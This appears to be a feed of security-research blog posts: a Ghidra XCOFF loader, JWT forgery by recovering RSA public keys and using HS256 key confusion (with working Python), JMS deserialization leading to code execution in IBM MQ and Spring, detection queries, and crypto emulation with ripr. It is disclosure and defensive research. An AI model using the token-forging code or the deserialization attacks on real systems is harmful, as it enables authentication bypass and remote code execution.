Adding XCOFF Support to Ghidra with Kaitai Struct

Author: b

It’s not a secret that we at Silent Signal are hopeless romantics, especially when it comes to classic Unix systems (1, 2, 3). Since some of these systems – which still run business-critical applications at our clients – are based on “exotic” architectures, we keep a nice hardware collection in our lab so we can experiment on bare metal.

We also spend quite some time with the Ghidra reverse engineering framework, which has built-in support for some of the architectures we are interested in, so the Easter holidays seemed like a good time to bring the two worlds together.

My test target was an RS/6000 system running IBM AIX. The CPU is a 32-bit, big-endian PowerPC that is already (mostly?) supported by Ghidra, but to my disappointment, the file format was not recognized when I imported one of the default AIX utilities into the framework. The executable format used by AIX is XCOFF, and as it turned out, Ghidra only has a partial implementation for it.

At this point I had multiple choices: I could start working on the existing XCOFF code, or I could try to hack the fully functional COFF loader just enough to make it accept XCOFF too, but none of these options made my heart beat faster:

  • Java doesn’t have unsigned primitive types, which makes parsing byte streams painful
  • The existing ~1000 LoC XCOFF implementation includes a wide set of structure definitions with basic getters and setters, but it doesn’t handle the more complex semantics of the input
  • The COFF loader expects everything to be little-endian – adding support for BE would require rewriting everything

Instead, I decided to start from scratch and develop code that:

  • is reusable in tools other than Ghidra
  • is easy to read, write and extend
  • has excellent debug tools

Ghidra ❤️ Kaitai

The above benefits are provided by Kaitai Struct, “a declarative binary format parsing language”. Instead of implementing a parser in a particular (procedural) language and framework, with Kaitai we can describe the binary format in a YAML-like structure (I know, YAML===bad, but believe me, this stuff works), and then let the Kaitai compiler produce parser code in different languages for us from the same declaration.

Although my Kaitai-fu (picked up mainly through these challenges at Avatao) was rusty, I managed to put together a partial, hacky, but working format declaration for XCOFF32 in a couple of hours, based on IBM’s documentation.
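For illustration, a fragment of such a declaration covering the XCOFF32 file header might look like the following (a simplified sketch, not my full declaration; field names and widths follow IBM’s documentation):

meta:
  id: xcoff
  endian: be
seq:
  - id: header
    type: file_header
types:
  file_header:
    seq:
      - id: f_magic    # 0x01df for XCOFF32
        type: u2
      - id: f_nscns    # number of sections
        type: u2
      - id: f_timdat   # timestamp
        type: u4
      - id: f_symptr   # file offset of the symbol table
        type: u4
      - id: f_nsyms    # number of symbol table entries
        type: u4
      - id: f_opthdr   # size of the auxiliary header
        type: u2
      - id: f_flags
        type: u2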

This approach also had some benefits from a research standpoint, as by reading the specification I could spot

  • inconsistencies between specification and implementation
  • redundant information (e.g. size specifications) in the spec

both of which can lead to interesting parsing bugs! (After this, I wasn’t surprised when, digging through Google, I found that IDA, which has built-in XCOFF support, has suffered from such bugs in the past.)

Coming back to Ghidra development, I could create two implementations from the same Kaitai structure: one in Python, one in Java. I could import the Java implementation as a class in my Ghidra Loader and debug Ghidra-specific code in Eclipse, while checking the semantic correctness of the parser and exploring the API more comfortably in a Python REPL:

$ python -i test.py portmir
.text 0x20
.data 0x40
.bss 0x80
.loader 0x1000
>>> hex(portmir.section_headers[0].s_vaddr)
'0x10000100'

… or just browse the parsed structures in KT‘s awesome WebIDE.
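For reference, a test harness like the one above can be as small as this sketch (the Xcoff module and the field names come from my own declaration, compiled with kaitai-struct-compiler -t python, so treat them as assumptions rather than an official API):

import sys
from xcoff import Xcoff  # module generated by kaitai-struct-compiler -t python

# Parse the file given as the first argument and dump section names and flags
portmir = Xcoff.from_file(sys.argv[1])
for sh in portmir.section_headers:
    print(sh.s_name.rstrip("\x00"), hex(sh.s_flags))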

Integrating the generated Java code with Ghidra was a piece of cake:

  • Add Kaitai’s runtime library to the project
  • Wrap the Java byte array provided by Ghidra’s ByteProvider with ByteBufferKaitaiStream, and use the appropriate constructor of the generated class

After the Ghidra-Kaitai interface was set up, the only things left were setting the default big-endian PowerPC language, letting Kaitai parse the section headers of the XCOFF file, and mapping them to the Program memory. After this, I could immediately see convincing disassembly and decompilation(!) results:

First disassembly and decompilation result

(Mysterious) Symbols of Love

To give Ghidra more hints about the program structure, I proceeded by parsing symbol information. I don’t want to dive deep into the XCOFF format in this post, but in short, there is a symbol table defined by the .loader section of the binary that holds information about imports and exports, and there is an optional symbol table, potentially referenced by the main header, for more detailed information. XCOFF files can also contain a TOC (table of contents) that, if present, holds valuable structural information for reverse engineering.

Since the small utility I used for testing only contained a loader symbol table, I implemented parsing for that, and managed to find the entry function of the file, which was not identified during automatic analysis.

To check my results, I also loaded the sample file into IDA, and to my surprise, this tool showed many more symbols than the loader symbol table holds! I searched for some of the missing symbols in the binary and found a single occurrence of every missing function name inside the .text section:

Length-prefixed string structure inside the .text section

After a lot of digging (and asking on Twitter) I found that this arrangement matches the Symbol Table Layout described in the specification:

Source: https://www.ibm.com/docs/en/aix/7.2?topic=formats-xcoff-object-file-format

So far, I couldn’t fully decipher this layout, but my working theory is that while the optional symbol table and TOC were removed by stripping, the per-function stabs remained untouched. If so, this is good news for reverse engineers interested in the XCOFF format :)

Update 2021.04.07: As /u/ohmantics pointed out, this is actually the Traceback Table of the function. Proper support for these structures is coming soon!

While the parser for this information should eventually live in a proper analyzer module, for now I put together a simple Python script that tries to parse these string structures from between declared functions and renames the functions accordingly (a minimal sketch follows below):

Pseudocode with additional symbol names
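The core of such a script can be sketched in Ghidra’s Jython, heavily simplified: real traceback tables carry optional fields before the name, so the naive scan below is only an approximation of what my script does, not a faithful copy.

import string
from ghidra.program.model.symbol import SourceType

# Scan the bytes right after each function for a big-endian u2 length
# followed by that many identifier-like characters, and use it as the name.
for func in currentProgram.getFunctionManager().getFunctions(True):
    try:
        raw = getBytes(func.getBody().getMaxAddress().add(1), 64)
    except:  # bare except also catches Java exceptions under Jython
        continue
    for i in range(len(raw) - 2):
        n = ((raw[i] & 0xff) << 8) | (raw[i + 1] & 0xff)
        if 0 < n <= len(raw) - i - 2:
            name = "".join(chr(b & 0xff) for b in raw[i + 2:i + 2 + n])
            if all(c in string.ascii_letters + string.digits + "_." for c in name):
                func.setName(name, SourceType.USER_DEFINED)
                break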

Summary

This blog post showed that Kaitai Struct can be an effective tool to add new formats to Ghidra. Parser development is a tedious and error-prone process that should be outsourced to machines, which don’t get frustrated at the 92nd bitfield definition, and can produce the same, correct implementation for every instance (provided you don’t screw up the parser declaration itself ;) ).

The post also allowed a peek inside the XCOFF format, which seems to be worth some security-minded study in parser applications.

We hope that our published code will attract contributors who are also interested in bringing XCOFF to Ghidra or even to other research tools.

Featured image is from Wikipedia (our boxes look much cooler)


Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those brave souls who dare to roll their own crypto

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL APIs didn’t trigger, but those placed in the depths of the library did, we realized that the developers had implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but it also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without that we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the differences derived from all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things that are worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms to find the GCD of numbers have existed since ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this point we had a quick-and-dirty implementation based on the gmpy2 library, which let us use large integers and modern, efficient algorithms from Python.
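The core of that implementation looks something like the following sketch (a hypothetical helper, assuming textbook RSA, where sig = m^d mod n, so sig^e − m is a multiple of n for every valid pair):

import gmpy2

def recover_modulus(pairs, e=65537):
    # For textbook RSA, sig**e - msg is a multiple of n for every valid
    # (msg, sig) pair, so the GCD of these values converges to n
    # (or to a small multiple of it, which trial division weeds out).
    acc = gmpy2.mpz(0)
    for msg, sig in pairs:
        acc = gmpy2.gcd(acc, gmpy2.mpz(sig) ** e - msg)
    return acc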

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation for it to strike me: the dirty little code we wrote for that custom RSA application could be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their way to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is that HMAC verification assumes the MAC was generated with the same key the verifier uses – the RSA public key – so if the attacker obtains the public key, she can forge the signature too.
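Sketched with nothing but the standard library, the forging step looks like this (pem must be a byte-for-byte copy of the key the verifier uses – obtaining it is exactly what the rest of this post is about):

import base64, hashlib, hmac, json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_hs256(claims, pem):
    # The PEM-encoded RSA public key doubles as the HMAC secret
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    signing_input = header + b"." + body
    mac = hmac.new(pem, signing_input, hashlib.sha256).digest()
    return signing_input + b"." + b64url(mac)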

In practice, however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to reject key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust the key filtering is – deprecating verification APIs that don’t take an explicit algorithm is certainly the way to go.)

Based on the documentation, RSA keys are provided to the encode/decode APIs (which also do signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message and signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JWS’s integer representations matches gmpy2’s.
  • Message canonization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of the token; no canonization of delimiters, whitespace or special characters is necessary.
  • Message padding: JWS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low-level crypto APIs (this took me a while, until I found this CTF writeup) provides standards compliant output without having to mess with ASN.1 – see the sketch after this list.
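As a sketch, the RS256 message representative – the integer our GCD code consumes in this scenario – can be built like this (the DigestInfo prefix is the standard SHA-256 one from PKCS #1):

import hashlib

# DER-encoded DigestInfo header for SHA-256 (PKCS #1 / RFC 8017)
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

def rs256_representative(signing_input, modulus_bits=2048):
    # EMSA-PKCS1-v1_5: 0x00 0x01 || 0xFF... || 0x00 || DigestInfo || hash
    t = SHA256_PREFIX + hashlib.sha256(signing_input).digest()
    ps = b"\xff" * (modulus_bits // 8 - len(t) - 3)
    return int.from_bytes(b"\x00\x01" + ps + b"\x00" + t, "big")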

No problem here: with some modifications to our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allow little room for changes, so there is a high chance that if we generate a standards compliant PEM file, it will match the one at the target. In case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key, which can block exploitation.

After a lot of cursing over the bugs and insufficient documentation of the pyasn1 and asn1 packages, asn1tools finally proved usable for creating custom DER (and thus PEM) structures. The generated output matched the original public key perfectly, so I could successfully demonstrate token forgery without any preliminary information about the asymmetric keys.
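A sketch of the working approach (the ASN.1 module is inlined; n and e are the recovered integers, and the function name is illustrative):

import base64, textwrap
import asn1tools

PKCS1_SPEC = """
PKCS1 DEFINITIONS ::= BEGIN
    RSAPublicKey ::= SEQUENCE {
        modulus         INTEGER,
        publicExponent  INTEGER
    }
END
"""

def pkcs1_pem(n, e=65537):
    spec = asn1tools.compile_string(PKCS1_SPEC, "der")
    der = spec.encode("RSAPublicKey", {"modulus": int(n), "publicExponent": e})
    # PEM: Base64 body wrapped at 64 characters, as commonly generated
    body = "\n".join(textwrap.wrap(base64.b64encode(der).decode(), 64))
    return ("-----BEGIN RSA PUBLIC KEY-----\n" + body +
            "\n-----END RSA PUBLIC KEY-----\n")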

We tested with the 2048-bit keys from the JWS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and it produced two candidate keys for PKCS #1, which could be easily tested.
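Testing a candidate is as simple as re-verifying a known signature with it (reusing the rs256_representative sketch from above):

def is_valid_modulus(n, signing_input, sig, e=65537):
    # Only the true modulus reproduces the padded digest of the message
    return pow(sig, e, n) == rs256_representative(signing_input, n.bit_length())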

As usual, all code is available on GitHub. If you need help to integrate this technique to your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard is figuring out all those implementation details that make pen-and-paper formulas work on actual computers. It won’t be a huge surprise to anyone who has worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement our task was to assess the security of a service built on IBM Integration Bus, an integration platform built around the Java Message Service (JMS). These scary-looking enterprise buzzwords usually hide systems of varying complexity connected with message queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last paragraph), we opted for a white-box analysis, which allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQs are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post; you should read it before moving on

Our target received JMS messages using the Spring Framework. Transport of messages was done over IBM MQ (formerly IBM Websphere MQ), this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:

Source

We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this spared a lot of time), and among other dynamic tests, we ran JMET against it. To our surprise, we popped a calculator in our test environment!

Now this was great, but to provide meaningful resolutions to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and performed some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this was a framework issue – fortunately it wasn’t, as the bug didn’t trigger. This narrowed down the code to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payloads were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream and pass it back to the user, but there is a hint of something weirder in the method signature:

 <T> T getBody(java.lang.Class<T> c);

The method can return objects of an arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents twice: first for the compatibility check, then to create the return object.

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly chains the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the more abstract Message class is provided by the JMS API, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

receiveMessage(Message m){ /* Do something with m, whatever that is */ }

can become this:

receiveMessage(Email e){ /* Do something with an E-mail */ } 

Of course, using this functionality to automatically convert messages to arbitrary Serializable objects is asking for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization, I created multiple branches of IBM’s sample application with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even when receiveMessage()’s argument was converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the classpath contains appropriate gadgets).

After inspecting the code a bit more, it seems that listener implementations can’t expect received messages to be of a certain safe type (such as TextMessage when the application works with Strings), so they do their best to transform the incoming messages to the type expected by the developer. Additionally, when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed that they “expect messaging channels to be trusted at application level”. They also agree that handling ObjectMessages is a difficult problem that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accept JMS message types that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters and expecting plain Message (or JMSMessage in case of IBM MQ) objects in the JmsListener prevents the problem, independently of the transport implementation. Simple getters, such as getText(), can be safely used after casting. Using even the simplest converted types, such as TextMessage, with IBM MQ is insecure! Common converters, such as the JSON-based MappingJackson2MessageConverter, need further research, as do other transports that decided not to implement countermeasures:

Patches resulted from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annotated with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL a simple predicate can be used to find appropriately annotated sources:

class ReceiveMessageMethod extends Method {
  ReceiveMessageMethod() {
    this.getAnAnnotation().toString().matches("JmsListener")
  }
}

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous API’s is also reasonably simple both in CodeQL:

predicate isJMSGetBody(Expr arg) {
  exists(MethodAccess call, Method getbody |
    call.getMethod() = getbody and
    getbody.hasName("getBody") and
    getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
    arg = call.getQualifier()
  )
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen in the following screenshot:

With Ocular, we can also get an exhaustive list of API’s that call ObjectInputStream.readObject() for the transport implementation in use, based on the available byte-code, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for the applications that rely on them. Connecting the paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries are soon to be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from the end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to figure out that at the end of the day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to mention getting these tests approved. Another result of this is that message queues are in many cases treated as inherently trusted – no one can attack a magic box that no one (at least none of us) knows exactly how it works, right?

Technical security assessments can be great opportunities not only to discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible, systems. In the end, we are the ones whose job is to understand systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser-known class of issues at the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.



Self-defenseless – Exploring Kaspersky’s local attack surface

Author: b

I had the pleasure of presenting my research on the IPC mechanisms of Kaspersky products at the IV. EuskalHack conference this weekend. My main motivation for this research was to further explore the attack surface hidden behind the self-defense mechanisms of endpoint security software, and I ended up with a local privilege escalation exploit that could be combined with an older self-defense bypass to make it work on default installations. I hope that the published information helps other curious people dig even deeper and find more interesting pieces of code.

The presentation and some code examples are available on GitHub.

My local privilege-escalation exploit demo can be watched here:

The exploit code will be released at a later time on GitHub, so you can have some fun reconstructing it based on the slides ;)


Drop-by-Drop: Bleeding through libvips

Author: b

During a recent engagement we encountered a quite common web application feature: profile image uploads. One of the tools we used for the tests was the UploadScanner Burp Suite extension, which reported no vulnerabilities. However, we noticed that the profile picture of our test user showed seemingly random pixels. This reminded us of the Yahoobleed bugs published by Chris Evans, so we decided to investigate further.



Bare Knuckled Antivirus Breaking

Author: b

Endpoint security products provide an attractive target for attackers because of their widespread use and high-privileged access to system resources. Researchers have already demonstrated the risks of complex input parsing with unmanaged code and even of sloppy implementations of client- and server-side components of these products. While these attacks are still relevant, it is generally overlooked how security software breaches some important security boundaries of the operating system. In this research we first present a generic self-defense bypass technique that allows the deactivation of multiple endpoint security products. Then we demonstrate that self-defense can hide exploitable attack surface by exploiting local privilege escalation vulnerabilities in 6 products of 3 different vendors. You can download our whitepaper here:

Bare-Knuckled Antivirus Breaking (PDF)

The following part of this blog post contains demonstration videos and some additional notes about the exploits described in the paper. We will also use this post to publish up-to-date information about affected vendors and fixes.



Emulating custom cryptography with ripr

Author: b

Custom cryptography and obfuscation are recurring patterns that we encounter during our engagements and research projects. Our experience shows that despite industry best practices and a long history of failures, these constructs don’t get fixed without a clear demonstration of their flaws. Most of the time, demonstration requires instrumenting the original software or reimplementing the algorithms from scratch. This way we can create specially crafted encrypted messages, find hash collisions, etc.

Ripr is a really exciting tool “that automatically extracts and packages snippets of machine code into a functionally identical python class backed by Unicorn-Engine”. I was really curious about how effectively this tool could be used, so I decided to create a new sample that models some of the algorithms we’ve seen and write up my experiences as a reference for others.

The test program

To put ripr to the test, I grabbed the first decent-looking RC4 implementation in C* and added an additional XOR step with a hardcoded 4-byte key to it. This small addition would simulate hardcoded keys, lookup tables and other constants that are commonly used in standard and non-standard algorithms alike. As we will see, resolving these structures is not a trivial task for a static analyzer.

I compiled the code with GCC without stripping the symbols, so I could work as if I had already done the reversing work to identify the subroutines of interest. I then loaded the binary into Binary Ninja and made ripr export the key scheduler (KSA) and the keystream generator (PRGA) functions as two Python classes, which I copied into a single script. As this was in the middle of a busy day, I just slapped some instantiation code onto it to see if the thing ran without any obvious errors.

ksa=KSA() # Instantiate key scheduler
ksa.run(key,S) # initialize cipher state (S) with key
print repr(S) 
prga=PRGA() # Instantiate keystream generator
prga.run(S,plain,cipher) # Run keystream generator with the calculated state
print repr(cipher)

It did, but in order to make the code do anything useful we need to understand what was and what wasn’t generated for us by ripr.

* I didn’t verify the correctness of this implementation and even noticed some oddities (like calculation of the ciphertext size), but any mistakes would make my candidate even better for a “homebrew” algorithm.

First commit (e1569ae)

The first thing I noticed is that the generated code doesn’t handle output arguments: arguments are just written to the memory of the emulator, but ripr doesn’t know that some of these allocations will contain important data at the end of the function’s run. This can be easily fixed by reading memory from the addresses pointed to by the argAddr_N variables. In our case the key scheduler populates the S buffer, so we have to read back the memory of arg_1 of KSA.run():

-        return self.mu.reg_read(UC_X86_REG_RAX)
+        return self.mu.mem_read(argAddr_1,256)

As you can see, I chose to implement a more “pythonic” interface for this method, returning the object of interest instead of using an output variable. You can see similar changes in the later commits where I’m finalizing the code.

When I executed this code, the KSA function ran successfully (but not necessarily correctly!), but the PRGA raised the following exception:

Traceback (most recent call last):
  File "prga.py", line 115, in <module>
    prga.run(S,plain,cipher)
  File "prga.py", line 57, in run
    self._start_unicorn(0x400733)
  File "prga.py", line 44, in _start_unicorn
    raise e
unicorn.unicorn.UcError: Invalid memory write (UC_ERR_WRITE_UNMAPPED)

 

Second commit (aaf375c)

It seems that the emulated program tries to access unmapped memory. Since the exception is caused by emulated code, the stack trace doesn’t provide information about what exactly went wrong. To debug this we need to know the instruction and the context where the emulation fails. One way to do this is to hook each instruction in Unicorn Engine but for me it was easier to extend the auto-generated exception handler code to print out context information when an unhandled exception happens:

             else:
+                print "RIP: %08X" % self.mu.reg_read(UC_X86_REG_RIP)  # 0x4007dd: mov eax, dword [rbp-0x1c]
+                print "EAX: %08X" % (self.mu.reg_read(UC_X86_REG_EAX))
                 raise e

The offending instruction can be seen as a comment above. EAX pointed to memory slightly above 0x4000, so I simply added a new mapping to the constructor of PRGA and the exception went away:

+        self.mu.mem_map(0x1000 * 4, 0x1000) # Missed mapping

After looking at the exception handlers I also tried to implement strlen() as a hook function that is meant to replace the original import call during emulation. Hooks for imported functions work by checking memory access exceptions against a defined list of addresses: if the saved return address points right after an imported function call, the generated code handles the exception by calling the corresponding hook function. As far as I can tell, return values should be manually set in the hook function (in this case setting EAX to the string length), but I also gave the function a return value for easier debugging (it turned out my original code had a pretty obvious bug, can you spot it?).

Third commit (5680b36)

So the code ran fine, but the results were different from what I got from the original binary. Two things were suspicious though:

  • My static obfuscator string (“ABCD”) was nowhere to be found in the generated code. This shows that manual reverse engineering is still crucial when using ripr.
  • My strlen() implementation was never called. Since hook functions are really easy to write, I suggest always adding some debug code (even simple prints) to them to prevent bugs like this. This is also a good way to get a high-level trace of the execution of the emulator.

With enough information obtained by reversing the program, the first problem can be resolved easily. In this case I also had a suspicious piece of memory in the generated code that I couldn’t originally connect to anything:

self.data_0 = '00000000000000000000000000000000540a400000000000'.decode('hex')

It turns out that my obfuscator key is located at 0x400a54. This piece of memory held the pointer to it, but that region was not properly populated (although it was mapped, so it didn’t cause an exception). Similarly, the import for strlen() was located at 0x4004d0 in the original binary, but not populated in the generated code by ripr. Adding these two lines to the PRGA constructor resolved these issues:

self.mu.mem_write(0x400a54L, "4142434400".decode('hex'))
self.mu.mem_write(0x4004d0L, "ff25410b2000".decode('hex'))

Note that the code written for the strlen() import is just a jump pointing to some memory unmapped in the emulator. This way an exception will be raised that can be handled by the code responsible for calling the hook function in Python.

Fourth commit (c9c7d3c)

What I failed to notice before this commit was that KSA also relied on strlen(). But since it was in a separate class using a different emulator instance, my previous changes didn’t affect it. One could merge the classes, but for the sake of simplicity I chose to just duplicate the code. After this, the emulated and the original program gave identical results.

Conclusion

All in all, I managed to create a working emulator in about two hours, without any prior experience with ripr. Assuming a proper understanding of the targeted program, I expect about the same effort from experienced users in case of real-life targets: the complexity of the task mostly depends on the number of unresolved data and code references, not on the complexity of the algorithm itself. Considering the amount of work needed to reimplement cryptographic code or to instrument large software, ripr will definitely be at the top of my list of tools when the next homebrew crypto-monster appears!


Conditional DDE

Author: b

